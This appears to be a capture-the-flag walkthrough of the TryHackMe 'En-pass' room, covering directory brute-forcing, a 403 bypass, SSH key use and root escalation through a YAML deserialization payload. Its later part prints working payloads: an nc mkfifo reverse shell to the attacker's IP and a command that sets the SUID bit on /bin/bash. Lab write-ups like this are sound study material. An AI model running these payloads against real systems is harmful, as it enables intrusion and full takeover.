Description: Get what you can't.

Tags: security, linux

Difficulty: Medium

Host: TryHackMe | En-pass (by kiransau) - https://tryhackme.com/room/enpass

Rustscan

I started by scanning the machine with Rustscan.

 rustscan -a 'machine-ip' -- -sC -sV
Rustscan result

GoBuster

With the webserver on port 8001 I started a GoBuster scan in the background to find any hidden directories adding some extensions to it.

 gobuster dir -u http://'machine-ip':8001/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,sh,cgi,html,zip,bak,sql,old
GoBuster scan result

Website

But first I went to port 8001 to view the main page. I saw three different pictures and on the bottom on two of them were some cryptic strings.

Index page

With ROT 23 I got the output "Best of Luck!!" and the second string decoded with Base64 contained the word "sadman".

The "403.php" page said "forbidden" and I'll inspect it later on.

403 page

and the "reg.php" page got me to an input field.

reg page

Then I quickly looked at the "/zip" directory and there was a ton of directories.

zip directory

I downloaded the first one but extracting the content of it once again had the word "sadman" in it. A rabbit hole.

ZIP dir content

SSH key

Now the "/web" directory returned the status code 301, but that didn't stop me from trying to search through it with GoBuster.

 gobuster dir -u http://'machine-ip':8001/web/ -w /usr/share/dirb/wordlists/common.txt

With this I found the directory "/resources" but again with the status code 301.

resources

I started another scan but I couldn't find anything. Therefore I had to step it up a bit and used a bigger wordlist.

 gobuster dir -u http://'machine-ip':8001/web/resources/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Here I got the directory "/infoseek"

infoseek

I ran another scan

 gobuster dir -u http://'machine-ip':8001/web/resources/infoseek -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

and found the directory "/configure".

Configure dir

And with the next scan I finally got to the end of it.

 gobuster dir -u http://'machine-ip':8001/web/resources/infoseek/configure -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
SSH key

I saved the key, set up the permission with

 chmod 600 key

but I still had to find a username.

PHP code

Next I went to the "reg.php" page again and looked at the source code.

reg source code

I am not an expert in reading PHP code but I worked through it one by one. So first, the code pickes the input and uses the "explode()" function to split it into single items with the comma as a seperator.

PHP explode

I started with the very basic stuff. First an array with 9 objects starting from index 0. I knew this, because the "val[8]" part is looking at the index number 8 and the for-loop cycles through the whole code below 9 times ($i < 9).

Array

Then I considered the string lengths of the objects form the first comparison. At index 0 it had to be 2 and at index 8 it had to be a lenghth of 3.

String lengths

To fulfill the next comparison, that some values have to be different, I simply entered a random value for each object. Another interesting thing is, that all the values are from the top of my keyboard in the numeric space. Maybe that had something to do with it. But nonetheless I got a possible input with it, all seperated with a comma.

Values filled
 §§,!,",(,),%,=,&,???

When I entered this array, I got a password. I was probably for the SSH key I found earlier. So theres only a username missing.

403 page

Another page I wanted to inspect further was "403.php". For this I stumbled across a lot of different resources about bypassing a 403 page. I looked into tools form lobuhi, iamj0ker and DirDar. With this I collected a huge list of possiblities and edited the scripts with the other paylods I found.

Running payload

As you can see, the only difference hit with

 [...]/403.php/..;/

With this payload I got the username.

Username

SSH access

Now that I collected every part, I logged in with the username, keyfile and the password.

 ssh -i key imsau@'machine-ip'

Here I got the first flag (*1).

Privilege escalation

I changed my shell with Pyton3.

 python3 -c 'import pty; pty.spawn("/bin/bash")'

I listed the root directory structue with

 cd / ls -la *

and found something in "/opt/scripts". The "file.py" in there was a Python script importing yaml. And with execution, it calls the file "/tmp/file.yml".

file script location

Because I couldn't find a cronjob running, I loaded "pspy" to the victim machine and after a short amount of time, this whole code block got executed.

pspy64

I had to search for quite a while but then I got to this post about hacking Python apps form Vickie Li. With this I wanted to insert a reversel shell first, but I couldn't get it to work with a Bash or Python shell. So I tried something different and forced the script, to display the root flag with the wall command. Here I hoped, that it was at the usual location.

 echo '!!python/object/apply:os.system ["wall /root/root.txt"]' > /tmp/file.yml
wall flag

Here I acutally got the flag (*2)!

Playing around some more

I got the last flag but the fact, that I wasn't able to spawn a shell bugged me. Also the name and location for the root flag was more like a shot in the dark. So I played around some more and then I tried the next shell I got in my list and got a hit.

 echo '!!python/object/apply:os.system ["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'my-own-ip' 4444 >/tmp/f"]' > /tmp/file.yml
Reverse shell

For the next time I have to keep in mind to try really every possible reverse shell I got. Another possibility would be setting the SUID bit for the "/bin/bash" binary.

 echo '!!python/object/apply:os.system ["chmod +s /bin/bash"]' > /tmp/file.yml
SUID bash

Task overview

1. Name The Path.

  • /web/resources/infoseek/configure/key

2. What is the user flag?

  • [...]

3. What is the root flag?

  • [...]
 This free site is ad-supported. Learn more